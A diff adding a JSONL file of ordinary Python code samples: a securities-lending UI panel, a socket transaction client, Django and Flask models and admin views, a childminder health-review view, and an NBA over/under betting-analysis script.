diff --git "a/3454.jsonl" "b/3454.jsonl" new file mode 100644--- /dev/null +++ "b/3454.jsonl" @@ -0,0 +1,656 @@ +{"seq_id":"3354389","text":"\"\"\" Compiled: 2020-09-18 10:38:55 \"\"\"\n\n#__src_file__ = \"extensions/SecuritiesLending/etc/FSecLendInventoryActiveLoansPanels.py\"\n\"\"\"------------------------------------------------------------------------------------------------\nMODULE\n FSecLendInventoryActiveLoansPanels\n\n (c) Copyright 2017 FIS FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n Inventory View - Panel displaying the currently selected security loan instrument(s)\n and active trades/positions in them.\n\n------------------------------------------------------------------------------------------------\"\"\"\nimport acm\nfrom FEvent import EventCallback\nfrom FSecLendCommon import CommonSheetPanelBase\nimport FSecLendHooks\nfrom FSecLendUtils import ASQLPortfolioProvider, ActiveLoansBaseQuery\nfrom FSecLendEvents import OnInventoryViewInventoryViewPositionSelected\n\n\nclass SecLendInventoryActiveLoansPanel(CommonSheetPanelBase):\n\n def __init__(self):\n super(SecLendInventoryActiveLoansPanel, self).__init__()\n self._instrument = None\n\n def UpdateInventorySheetContents(self, instrument, status=None):\n if instrument:\n query = ActiveLoansBaseQuery()\n orNodeUnd = query.AddOpNode('OR')\n orNodeUnd.AddAttrNode('Instrument.Underlying.Name', 'EQUAL', instrument.Name())\n orNodePort = query.AddOpNode('OR')\n portfolio = FSecLendHooks.DefaultPortfolio()\n if portfolio:\n prtfs = portfolio.AllPhysicalPortfolios() if portfolio.IsKindOf(acm.FCompoundPortfolio) else [portfolio]\n for prtf in prtfs:\n orNodePort.AddAttrNode('Portfolio.Name', 'EQUAL', prtf.Name())\n if status:\n query.AddAttrNodeEnum('Status', status)\n folder = acm.FASQLQueryFolder()\n folder.Name('{0} - {1}'.format(instrument.Name(), portfolio.Name()))\n folder.AsqlQuery(query)\n asqlPortfolio = ASQLPortfolioProvider().GetOrCreateFromQuery(folder)\n self.SetSheetContents(asqlPortfolio)\n\n def SelectionChanged(self, selection):\n rowObjects = selection.SelectedRowObjects()\n if rowObjects:\n self.SendEvent(OnInventoryViewInventoryViewPositionSelected(self, rowObjects))\n\n def ClearPositionSelection(self):\n self.SendEvent(OnInventoryViewInventoryViewPositionSelected(self, None))\n\nclass SecLendInventoryActivePanel(SecLendInventoryActiveLoansPanel):\n\n def SetSheetContents(self, folder):\n self.Sheet().InsertObject(folder, 'IOAP_REPLACE')\n self.Sheet().RowTreeIterator(0).Tree().Expand(True, self.Settings().ExpandTreeLevels())\n rowIter = self.Sheet().RowTreeIterator(True).FirstChild()\n rowIter.Tree().VisibilityController().ShowZeroPositions(False)\n\n @EventCallback\n def OnInventoryViewInstrumentsSelected(self, event):\n \"\"\"Active should have all trades statues since it's a portfolio sheet. 
exclusion should be\n done in the valuation parameters.\"\"\"\n instrument = event.GetUnderlyingOrSelf()\n if self._instrument != instrument:\n self._instrument = instrument\n self.UpdateInventorySheetContents(instrument)\n self.ClearPositionSelection()\n\n\n\nclass SecLendInventoryPendingPanel(SecLendInventoryActiveLoansPanel):\n\n def SetSheetContents(self, folder):\n self.Sheet().InsertObject(folder, 'IOAP_REPLACE')\n self.Sheet().RowTreeIterator(0).Tree().Expand(True, self.Settings().ExpandTreeLevels())\n\n @EventCallback\n def OnInventoryViewInstrumentsSelected(self, event):\n \"\"\"Filter on trade status here since pending will have only the trades not yet\n settled\"\"\"\n instrument = event.GetUnderlyingOrSelf()\n if self._instrument != instrument:\n self._instrument = instrument\n self.UpdateInventorySheetContents(instrument, FSecLendHooks.FillTradeStatus())\n self.ClearPositionSelection()","sub_path":"Extensions/_securities_lending_py/FPythonCode/FSecLendInventoryActiveLoansPanels.py","file_name":"FSecLendInventoryActiveLoansPanels.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9585623","text":"import socket\nimport threading\nimport logging\nimport pickle\nimport sys\nimport json\nimport time\nimport datetime\n\n# macros\nCONFIG_FILE = 'config.json'\nSERVER = socket.gethostbyname(socket.gethostname())\nFORMAT = 'utf-8'\nLEADER_CHANGE = 'LEADER_CHANGE'\n\n\nclass Client:\n def __init__(self, port):\n ADDRESS = (SERVER, port)\n self.clientID = chr(ord('A') + (port % 6000))\n self.leader = 5051 # need to retrieve from state.cfg\n\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind(ADDRESS)\n self.server_socket.listen()\n\n self.status = 1\n self.server_start = 0\n input_transactions = threading.Thread(target=self.inputTransactions)\n input_transactions.start()\n while True:\n connection, address = self.server_socket.accept()\n logging.debug(\"[CLIENT CONNECTED] {}\".format(str(connection)))\n\n listen_transactions = threading.Thread(target=self.listenTransactions, args=(connection, address))\n listen_transactions.start()\n\n def sendServer(self, message):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n client.connect((SERVER, int(self.leader)))\n client.sendall(bytes(message))\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n client.close()\n\n def inputTransactions(self):\n print(\"Establishing connection with Servers\")\n while True:\n if self.status == 1:\n self.status = 0\n raw_type = input(\"Please enter your transaction:\")\n s = raw_type.split(' ')\n\n if s[1] == self.clientID:\n if s[0] == 'T' or s[0] == 't':\n logging.debug(\"[TRANSFER TRANSACTION] {}\".format(s))\n transaction = {'Type': 'CLIENT_MESSAGE', 'Transaction': 'T', 'S': s[1], 'R': s[2],\n 'A': int(s[3])}\n message = pickle.dumps(transaction)\n\n try:\n self.sendServer(message)\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n i = 0\n while self.status == 0:\n time.sleep(1)\n i = i + 1\n if i == 6:\n i = 0\n print(\"TIMEOUT! 
Trying again\")\n self.sendServer(message)\n\n elif s[0] == 'B' or s[0] == 'b':\n transaction = {'Type': 'CLIENT_MESSAGE', 'Transaction': 'B', 'S': self.clientID}\n logging.debug(\"[TRANSFER TRANSACTION] {}\".format(s))\n message = pickle.dumps(transaction)\n\n try:\n self.sendServer(message)\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n i = 0\n while self.status == 0:\n time.sleep(1)\n i = i + 1\n if i == 8:\n self.sendServer(message)\n\n else:\n print(\"Incorrect Transaction\")\n self.status = 1\n else:\n print(\"Incorrect Transaction\")\n self.status = 1\n\n def listenTransactions(self, connection, address):\n while True:\n msg = connection.recv(1024).decode(FORMAT)\n if 'NEW_LEADER' in msg:\n self.leader = msg.split(' ')[1]\n elif msg:\n print(msg)\n self.status = 1\n\n\nif __name__ == '__main__':\n PORT = sys.argv[1]\n logging.basicConfig(filename='Client' + str(PORT) + '.log', level=logging.DEBUG, filemode='w')\n client = Client(int(PORT))\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583127493","text":"# Create your models here.\nfrom __future__ import unicode_literals\n\n# from country_regions.models import Region, Country\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\n\nclass AuditTrail(models.Model):\n created_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name='audit_trail_created')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name='audit_trail_updated')\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Skills(AuditTrail):\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass MainSector(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass SubSector(models.Model):\n main_sector = models.ForeignKey(MainSector, on_delete=models.CASCADE)\n name = models.CharField(max_length=30)\n\n class Meta:\n ordering = ['name']\n unique_together = [('main_sector', 'name')]\n\n def __str__(self):\n return f'{self.main_sector} : {self.name}'\n\n\nclass AbstractAddress(models.Model):\n # country = models.ForeignKey(Country, on_delete=models.CASCADE, help_text=\"Country\")\n # state = models.ForeignKey(Region, on_delete=models.CASCADE, blank=True, help_text=\"Region/State\")\n country = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Country\"\n )\n state = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Region/State\"\n )\n district = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"District\"\n )\n town_city = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Village/Taluka/Town/City.\"\n )\n street_name = models.CharField(\n max_length=255,\n blank=True,\n default='',\n help_text=\"Street name\"\n )\n address_line = models.CharField(\n max_length=255,\n blank=True,\n help_text=\"House name/number\"\n )\n post_code = models.CharField(\n max_length=15,\n blank=True,\n default='',\n help_text=\"Post/ZIP code\"\n )\n plus_code = models.CharField(\n max_length=20,\n blank=True,\n default='',\n 
help_text=\"Plus code (https://maps.google.com/pluscodes/)\"\n )\n\n class Meta:\n abstract = True\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"146095637","text":"from flask import render_template, request, redirect, url_for, flash, abort\n\nfrom .. import routes\nfrom app.database.query import read_users, read_user_by_no, create_user, update_user, read_user_apps\nfrom app.database.models import User\nfrom app.util.forms import UserCreateFormAdmin, UserUpdateFormAdmin\nfrom app.util.roles import user_in_roles\n\n\n# 관리자 - 사용자 리스트\n@routes.route('/manage/users', methods=['GET'])\n@user_in_roles(['admin'])\ndef manage_users():\n condition_key = request.args.get('cond_key', '', type=str).strip()\n condition_value = request.args.get('cond_val', '', type=str).strip()\n\n page = request.args.get('page', 1, type=int)\n per_page = request.args.get('per_page', 10, type=int)\n\n users = read_users(page, per_page, condition_key, condition_value)\n return render_template('manage/users.html', users=users, condition_key=condition_key, condition_value=condition_value)\n\n\n# 관리자 - 사용자 상세\n@routes.route('/manage/users/', methods=['GET', 'POST'])\n@user_in_roles(['admin'])\ndef manage_user(user_no):\n if request.method == 'GET':\n user = read_user_by_no(user_no)\n if user is None and user_no != 'create':\n return abort(404)\n\n if user_no == 'create':\n form = UserCreateFormAdmin(obj=user)\n else:\n form = UserUpdateFormAdmin(obj=user)\n\n if request.method == 'POST':\n if request.form['action'] == 'update':\n form = UserUpdateFormAdmin(request.form)\n\n if request.form['action'] == 'create':\n form = UserCreateFormAdmin(request.form)\n\n if form.validate():\n user = User(\n USER_ID=form.USER_ID.data,\n USER_NM=form.USER_NM.data,\n USER_COMP=form.USER_COMP.data,\n USER_HP_NO=form.USER_HP_NO.data,\n USER_EMAIL=form.USER_EMAIL.data,\n USER_ROLE=form.USER_ROLE.data,\n )\n\n if form.USER_PW.data:\n user.set_password(form.USER_PW.data)\n\n if request.form['action'] == 'update':\n user.USER_NO = form.USER_NO.data\n user.APPROVAL = form.APPROVAL.data\n update_user(user)\n flash('사용자 데이터가 업데이트 되었습니다.')\n\n if request.form['action'] == 'create':\n user.APPROVAL = True\n create_user(user)\n flash('사용자가 추가되었습니다.')\n return redirect(url_for('routes.users'))\n\n return render_template('/manage/user.html', form=form)\n\n\n# 관리자 - 앱 사용자 리스트\n@routes.route('/manage/appusers', methods=['GET'])\n@user_in_roles(['admin'])\ndef manage_appusers():\n condition_key = request.args.get('cond_key', '', type=str).strip()\n condition_value = request.args.get('cond_val', '', type=str).strip()\n\n page = request.args.get('page', 1, type=int)\n per_page = request.args.get('per_page', 10, type=int)\n\n users = read_user_apps(page, per_page, condition_key, condition_value)\n return render_template('manage/appusers.html', users=users, condition_key=condition_key, condition_value=condition_value)\n","sub_path":"app/routes/manage/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180742411","text":"import logging\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom ...forms.childminder_forms.form import HealthForm\nfrom ...models import 
Application, Arc, HealthDeclarationBooklet\nfrom ...review_util import redirect_selection, request_to_comment, save_comments\nfrom ...decorators import group_required, user_assigned_application\n\n# Initiate logging\nlog = logging.getLogger('')\n\n@login_required\n@group_required(settings.ARC_GROUP)\n@user_assigned_application\ndef health_check_answers(request):\n \"\"\"\n Method returning the template for the Your health: answers page (for a given application)\n displaying entered data for this task and navigating to the task list when successfully completed\n :param request: a request object used to generate the HttpResponse\n :return: an HttpResponse object with the rendered Your health: answers template\n \"\"\"\n table_name = 'HDB'\n\n if request.method == 'GET':\n application_id_local = request.GET[\"id\"]\n hdb_id = HealthDeclarationBooklet.objects.get(application_id=application_id_local).hdb_id\n form = HealthForm(table_keys=[hdb_id])\n\n elif request.method == 'POST':\n application_id_local = request.POST[\"id\"]\n hdb_id = HealthDeclarationBooklet.objects.get(application_id=application_id_local).hdb_id\n form = HealthForm(request.POST, table_keys=[hdb_id])\n\n if form.is_valid():\n comment_list = request_to_comment(hdb_id, table_name, form.cleaned_data)\n save_successful = save_comments(request, comment_list)\n\n if not comment_list:\n section_status = 'COMPLETED'\n else:\n section_status = 'FLAGGED'\n\n if save_successful:\n status = Arc.objects.get(pk=application_id_local)\n status.health_review = section_status\n status.save()\n default = '/dbs-check/summary/'\n redirect_link = redirect_selection(request, default)\n\n log.debug(\"Handling submissions for health declaration page - save successful\")\n return HttpResponseRedirect(settings.URL_PREFIX + redirect_link + '?id=' + application_id_local)\n\n else:\n log.debug(\"Handling submissions for health declaration page - save successful\")\n return render(request, '500.html')\n\n send_hdb_declare = HealthDeclarationBooklet.objects.get(application_id=application_id_local).send_hdb_declare\n application = Application.objects.get(pk=application_id_local)\n variables = {\n 'form': form,\n 'application_id': application_id_local,\n 'send_hdb_declare': send_hdb_declare,\n 'health_status': application.health_status,\n }\n\n log.debug(\"Rendering health declaration page\")\n return render(request, 'childminder_templates/health-check-answers.html', variables)\n","sub_path":"arc_application/views/childminder_views/health_declaration_booklet.py","file_name":"health_declaration_booklet.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499093572","text":"#!/usr/bin/env python\n\n\n\"\"\"\nTHIS IS A SKELETON OF WHAT A NORMAL PYTHON SCRIPT SHOULD LOOK LIKE\n\"\"\"\n\nimport time, os, sys\nfrom datetime import datetime\nfrom optparse import OptionParser\nimport pandas as pd\nimport numpy as np\nimport Tutils\nimport NBA_utils\n\nfrom bokeh.plotting import figure, show, output_file, save\n\nTOOLS = \"pan,box_zoom,reset,save,box_select,undo,redo,crosshair\"\nHOME_TEAM = 'HomeTeam'\nHOME_TEAM_PTS = 'HomePoints'\nAWAY_TEAM = 'AwayTeam'\nAWAY_TEAM_PTS = 'AwayPoints'\n\n \ndef analyze_team_over_under(game_df):\n \"\"\"\n Look at the over under spreads for each team, not considering home/away\n \"\"\"\n # Get all of the teams that we have\n all_teams = game_df[HOME_TEAM].append(game_df[AWAY_TEAM]).unique().tolist()\n\n # Loop over each specific team, and 
see how games they play in compare to the over/under\n team_list = []\n home_over_list = []\n home_under_list = []\n home_perfect_list = []\n home_skipped_list = []\n away_over_list = []\n away_under_list = []\n away_perfect_list = []\n away_skipped_list = []\n \n for team in all_teams:\n # Get all home games for this team\n team_home_games = game_df[game_df[HOME_TEAM]==team]\n # Check the over/under spreads\n (home_over, home_under, home_perfect, home_skipped) = NBA_utils.analyze_over_under(team_home_games)\n \n # Get all away games for this team\n team_away_games = game_df[game_df[AWAY_TEAM]==team]\n # Check the over/under spreads\n (away_over, away_under, away_perfect, away_skipped) = NBA_utils.analyze_over_under(team_away_games)\n team_list.append(team)\n home_over_list.append(home_over)\n home_under_list.append(home_under)\n home_perfect_list.append(home_perfect)\n home_skipped_list.append(home_skipped)\n away_over_list.append(away_over)\n away_under_list.append(away_under)\n away_perfect_list.append(away_perfect)\n away_skipped_list.append(away_skipped)\n \n #print (\"Home games for team: %s\" % team)\n #print_over_under(home_over, home_under, home_perfect, home_skipped) \n #print (\"Away games for team: %s\" % team)\n #print_over_under(away_over, away_under, away_perfect, away_skipped)\n\n df = pd.DataFrame()\n df['Team'] = team_list\n df['Home_over_count'] = home_over_list\n df['Home_under_count'] = home_under_list\n df['Home_perfect_count'] = home_perfect_list\n df['Home_skipped_count'] = home_skipped_list\n df['Away_over_count'] = away_over_list\n df['Away_under_count'] = away_under_list\n df['Away_perfect_count'] = away_perfect_list\n df['Away_skipped_count'] = away_skipped_list \n df['Total_over_count'] = df['Home_over_count']+df['Away_over_count']\n df['Total_under_count'] = df['Home_under_count']+df['Away_under_count']\n df['Total_perfect_count'] = df['Home_perfect_count']+df['Away_perfect_count']\n df['Total_skipped_count'] = df['Home_skipped_count']+df['Away_skipped_count']\n out_file = \"Team_away_under_map.csv\"\n print (\"Writing team over under counts to %s\" % out_file)\n df.to_csv(out_file, columns = ['Team', 'Total_over_count', 'Total_under_count',\n 'Total_perfect_count'], index=False)\n \n\ndef plot_point_based_over_under(game_df):\n \"\"\"\n \"\"\"\n non_missing_df = game_df[pd.isnull(game_df['Over_Under_HIT'])==False]\n all_OUS = non_missing_df['predicted_over_under'].unique().tolist()\n #range_bins = range(195,230,5)\n for i in range(195,230,3):\n min_bound = i-3\n max_bound = i\n ou_line_df = non_missing_df[((abs(non_missing_df['predicted_over_under']) > min_bound) &\n (abs(non_missing_df['predicted_over_under']) <= max_bound))]\n print (min_bound, max_bound, len(ou_line_df), sum(ou_line_df['Over_Under_HIT']))\n #for OU_line in sorted(all_OUS):\n # ou_line_df = non_missing_df[non_missing_df['predicted_over_under']==OU_line]\n # print (OU_line, len(ou_line_df), sum(ou_line_df['Over_Under_HIT']))\n sys.exit()\n\ndef plot_over_under(game_df):\n # Drop all rows where there isn't a predicted_over_under\n game_df.dropna(subset=['predicted_over_under'], inplace=True)\n # Get count of how many games were over or under the spread\n sorted_df = game_df.sort_values(\"EpochDt\").reset_index()\n x_vals = []\n y_vals = []\n size_vals = [] \n new_col = []\n # Get a list of all unique dates for this dataframe\n all_dates = sorted_df['GameTime'].unique().tolist()\n num_dt = 0\n running_total = 0\n for dt in all_dates:\n dt_df = sorted_df[sorted_df['GameTime']==dt]\n daily_OU = 
[]\n sample_size = 0\n for ind, row in dt_df.iterrows():\n if pd.isnull(row['predicted_over_under']):\n continue\n game_points = row[AWAY_TEAM_PTS] + row[HOME_TEAM_PTS]\n predicted_points = row['predicted_over_under']\n sample_size += 1\n # If the predicted points were less than the actual points\n if abs(game_points) > abs(predicted_points):\n daily_OU.append(1)\n elif abs(game_points) < abs(predicted_points):\n daily_OU.append(-1)\n num_dt+=1 \n if len(daily_OU) ==0:\n continue\n running_total += sum(daily_OU)\n x_vals.append(num_dt)\n y_vals.append(running_total)\n size_vals.append(sample_size*2)\n print (dt_df)\n p1 = figure(plot_width=1000, tools=TOOLS)\n p1.line(x_vals, y_vals, legend='Daily_Over_Under')\n p1.circle(x_vals, y_vals, fill_color='white', size=size_vals)\n\n show(p1)\n\ndef get_over_under_error(game_df): \n # Get count of how many games were over or under the spread\n error_list = []\n for ind, row in game_df.iterrows():\n if pd.isnull(row['predicted_over_under']):\n continue\n game_points = row[HOME_TEAM_PTS] + row[AWAY_TEAM_PTS]\n predicted_points = abs(row['predicted_over_under'])\n diff = abs(game_points - predicted_points)\n error_list.append(diff)\n \n return (sum(error_list)/len(error_list))\n\ndef get_team_points_map(game_df):\n \"\"\"\n \"\"\"\n # Key = team\n # Value = [home_points, allowed_points_at_home,\n # away_points, allowed_points_away,\n # avg_points, avg_allowed_points]\n points_map = {}\n \n \n # Get all of the teams that we have\n all_teams = game_df[HOME_TEAM].append(game_df[AWAY_TEAM]).unique().tolist()\n for team in all_teams:\n points_list = []\n # Get every game where this team is the home team\n team_home_df = game_df[game_df[HOME_TEAM]==team]\n home_points = team_home_df[HOME_TEAM_PTS].mean()\n points_list.append(home_points)\n allowed_home_points = team_home_df[AWAY_TEAM_PTS].mean()\n points_list.append(allowed_home_points)\n \n # Get every game where this team is the away team\n team_away_df = game_df[game_df[AWAY_TEAM]==team]\n away_points = team_away_df[AWAY_TEAM_PTS].mean()\n points_list.append(away_points)\n allowed_away_points = team_away_df[HOME_TEAM_PTS].mean()\n points_list.append(allowed_away_points)\n \n avg_scored_points = (home_points + away_points) / 2\n points_list.append(avg_scored_points)\n avg_allowed_points = (allowed_home_points + allowed_away_points) / 2\n points_list.append(avg_allowed_points)\n \n points_map[team] = points_list\n\n return points_map\n \n\n\ndef find_previous_game_home_team(row, ind, game_df):\n \"\"\"\n \"\"\"\n # Get all games for this team and sort them on 'Start (ET)'\n team_df = game_df[((game_df[HOME_TEAM] == row[HOME_TEAM]) |\n (game_df[AWAY_TEAM] == row[HOME_TEAM]))].sort_values('EpochDt')\n\n t_ind = ind\n while t_ind > 0:\n t_ind -= 1\n if t_ind in team_df.index:\n return team_df.loc[t_ind]\n\n return pd.DataFrame()\n\ndef find_previous_game_away_team(row, ind, game_df):\n \"\"\"\n \"\"\"\n # Get all games for this team and sort them on 'Start (ET)'\n team_df = game_df[((game_df[HOME_TEAM] == row[AWAY_TEAM]) |\n (game_df[AWAY_TEAM] == row[AWAY_TEAM]))].sort_values('EpochDt')\n\n t_ind = ind\n while t_ind > 0:\n t_ind -= 1\n if t_ind in team_df.index:\n return team_df.loc[t_ind]\n\n return pd.DataFrame()\n\n \n \ndef analyze_team_rest_over_under(game_df): \n \"\"\"\n \"\"\"\n time_sorted_df = game_df.sort_values('EpochDt').reset_index()\n for ind, row in time_sorted_df.iterrows():\n prev_home_team_game = find_previous_game_home_team(row, ind, time_sorted_df)\n prev_away_team_game = 
find_previous_game_away_team(row, ind, time_sorted_df) \n if len(prev_home_team_game) == 0:\n print (row)\n print (\"No previous home game\")\n print (\"------------------------------\")\n else:\n print (row)\n print (\"Previous_home_game ----------------\")\n print (prev_home_team_game)\n if len(prev_away_team_game) == 0:\n print (row)\n print (\"No previous away game\")\n print (\"------------------------------\") \n else:\n print (row)\n print (\"Previous_away_game ----------------\")\n print (prev_away_team_game)\n\n \ndef get_epoch_dt(row):\n game_date_str = str(int(row['GameTime']))\n return Tutils.tme2epoch(game_date_str, \"%Y%m%d\")\n\ndef print_statistics(game_df, out_file):\n \"\"\"\n \"\"\"\n print (\"Printing statistics to: %s\" % out_file)\n outF = open(out_file, \"w\")\n\n # Get the total over_under error\n total_over_under_error = get_over_under_error(game_df)\n outLine = \"Total over_under error: %s\\n\" % total_over_under_error\n outF.write(outLine)\n\n # Get actual team home and away points\n team_points_map = get_team_points_map(game_df)\n outLine = \"Team, AvgHomePoints, AvgAllowedHomePoints, AvgAwayPoints, AvgAllowedPointsAwway, AvgPointsScored, AvgAllowedPoints\\n\"\n outF.write(outLine)\n for t in team_points_map:\n outLine = \"%-25s,%3d,%3d,%3d,%3d,%3d,%3d\\n\" % (t, team_points_map[t][0], team_points_map[t][1],\n team_points_map[t][2], team_points_map[t][3],\n team_points_map[t][4], team_points_map[t][5])\n \n outF.write(outLine)\n \n outF.close()\n\ndef get_prior_home_game_avg(row, game_df, points_var, lookback_games):\n \"\"\"\n \"\"\"\n # Get a subset of the dataframe that is only for this teams home games\n home_game_df = game_df[((game_df[\"HomeTeam\"] == row[\"HomeTeam\"]) &\n (game_df[\"EpochDt\"] < row[\"EpochDt\"]))].reset_index()\n\n return home_game_df[points_var][-lookback_games:].mean()\n\ndef get_prior_away_game_avg(row, game_df, points_var, lookback_games):\n \"\"\"\n \"\"\"\n # Get a subset of the dataframe that is only for this teams home games\n away_game_df = game_df[((game_df[AWAY_TEAM] == row[AWAY_TEAM]) &\n (game_df[\"EpochDt\"] < row[\"EpochDt\"]))].reset_index()\n\n return away_game_df[points_var][-lookback_games:].mean()\n\ndef get_team_rest(row, game_df, key):\n \"\"\"\n \"\"\"\n # Get all games for this team\n team_df = game_df[((game_df[HOME_TEAM] == row[key]) | (game_df[AWAY_TEAM] == row[key]))]\n time_df = team_df[(team_df['EpochDt'] < row['EpochDt'])].reset_index()\n\n if len(time_df) == 0:\n return -1\n \n last_game = time_df.iloc[-1]['EpochDt']\n\n # Get difference in time\n time_diff_secs = row['EpochDt']-last_game\n\n # Return the time in days and round up to nearest day\n return (round(time_diff_secs/86400))\n\ndef analyze_betting_strats(game_df):\n \"\"\"\n \"\"\"\n # Add columns for points scored over past X games\n prior_games_to_avg = [1,3]\n for prior_game in prior_games_to_avg:\n var_key = \"HomeTeamPointsScoredPast_%d_HomeGame\" % prior_game\n game_df[var_key] = game_df.apply(lambda row: get_prior_home_game_avg(row, game_df, HOME_TEAM_PTS, prior_game),\n axis=1)\n var_key = \"AwayTeamPointsScoredPast_%d_AwayGame\" % prior_game\n game_df[var_key] = game_df.apply(lambda row: get_prior_away_game_avg(row, game_df, AWAY_TEAM_PTS, prior_game),\n axis=1)\n\n\n # Add columns for home and away team rest\n game_df[\"HomeRest\"] = game_df.apply(lambda row: get_team_rest(row, game_df, HOME_TEAM), axis=1)\n game_df[\"AwayRest\"] = game_df.apply(lambda row: get_team_rest(row, game_df, AWAY_TEAM), axis=1) \n\n rest_over_under_map = {}\n 
for ind, row in game_df.iterrows():\n # If there isn't a rest listed for one of the teams, skip\n if (row['HomeRest'] == -1) or (row['AwayRest'] == -1):\n continue\n total_rest = row['HomeRest'] + row['AwayRest']\n if total_rest not in rest_over_under_map:\n rest_over_under_map[total_rest] = []\n\n game_points = row[AWAY_TEAM_PTS] + row[HOME_TEAM_PTS]\n # Append 1 if it is over the predicted amnt, 0 if not\n if game_points > abs(row['predicted_over_under']):\n rest_over_under_map[total_rest].append(1)\n elif game_points < abs(row['predicted_over_under']):\n rest_over_under_map[total_rest].append(0)\n \n for key in sorted(rest_over_under_map):\n print (\"Total_Rest: %d\" % key)\n print (\"BeatOdds: %f\" % (sum(rest_over_under_map[key]) / len(rest_over_under_map[key])))\n print (\"SampleSize: %d\" % len(rest_over_under_map[key]))\n \n ## Test Over/Under strategy\n #strat_success_list = []\n #for ind, row in game_df.iterrows():\n # # Ignore if either of these are missing\n # if pd.isnull(row['HomeTeamPointsScoredPast_1_HomeGame'])==True or pd.isnull(row['AwayTeamPointsScoredPast_1_AwayGame'])==True:\n # continue\n # # Ignore if we don't have predicted values\n # if pd.isnull(row['predicted_over_under']):\n # continue\n # avg_points_scored_past_games = row['HomeTeamPointsScoredPast_1_HomeGame'] + row['AwayTeamPointsScoredPast_1_AwayGame']\n # game_points = row['AwayPoints'] + row[HOME_TEAM_PTS]\n\n # print (row)\n # print (\"Average_past_points: %f\" % avg_points_scored_past_games)\n # print (\"Game_Points: %f\" % game_points)\n # if avg_points_scored_past_games < abs(row['predicted_over_under']):\n # if game_points < abs(row['predicted_over_under']):\n # strat_success_list.append(1)\n # else:\n # strat_success_list.append(0)\n # elif avg_points_scored_past_games > abs(row['predicted_over_under']):\n # if game_points > abs(row['predicted_over_under']):\n # strat_success_list.append(1)\n # else:\n # strat_success_list.append(0)\n # print (\"Success/Fail: %s\" % strat_success_list[-1])\n #print (len(strat_success_list))\n #print (sum(strat_success_list)/len(strat_success_list))\n \n game_df.to_csv(\"tmp.csv\")\n \n\ndef process(game_dir, odds_dir, file_base, options):\n \"\"\"\n \"\"\"\n # First read the game file\n game_df = NBA_utils.read_OP_bball_dir(game_dir)\n game_df['EpochDt'] = game_df.apply(lambda row: get_epoch_dt(row), axis=1)\n\n \n # Read all of the odds files\n odds_df = NBA_utils.read_odds_dir(odds_dir, file_base)\n\n # Add the predicted_scores and predicted_over_under spreads to the game df\n NBA_utils.add_odds(game_df, odds_df)\n\n if options.statistics_file:\n print_statistics(game_df, options.statistics_file)\n sys.exit()\n print (\"Analyzing %d games\" % (len(game_df)))\n \n # Look at all over unders\n (over, under, perfect, skipped) = NBA_utils.add_over_under_col(game_df, \"HomePoints\", \"AwayPoints\", \"Over_Under_HIT\")\n NBA_utils.print_over_under(over, under, perfect, skipped)\n #plot_point_based_over_under(game_df)\n plot_over_under(game_df)\n\n # Look at team-specific over unders\n #analyze_team_over_under(game_df)\n\n # Find rest inbetween games\n # -- To see if teams who just recently played often beat the spread or not\n #analyze_team_rest_over_under(game_df)\n\n # Look at betting strategies\n #analyze_betting_strats(game_df)\n\n\ndef main():\n usage_str = \"%prog basketball_game_dir odds_dir file_base\"\n usage_str = \"%s\\n\\t basketball_game_dir : dir containing csv file containing final scores of the games\" % usage_str\n usage_str = \"%s\\n\\t odds_dir : 
directory with dated subdirs containing csv files of the odds\" % usage_str\n usage_str = \"%s\\n\\t file_base : basename of files to grab\" % usage_str \n parser = OptionParser(usage = usage_str)\n parser.add_option(\"-s\", \"--print_statistics\", dest=\"statistics_file\", help=\"Write statistic info to this file\")\n \n (options, args) = parser.parse_args()\n \n if len(args) < 3:\n parser.print_help()\n sys.exit(2)\n\n \n game_dir = args[0]\n odds_dir = args[1]\n file_base = args[2]\n\n process(game_dir, odds_dir, file_base, options)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/python/look_at_games.py","file_name":"look_at_games.py","file_ext":"py","file_size_in_byte":17311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
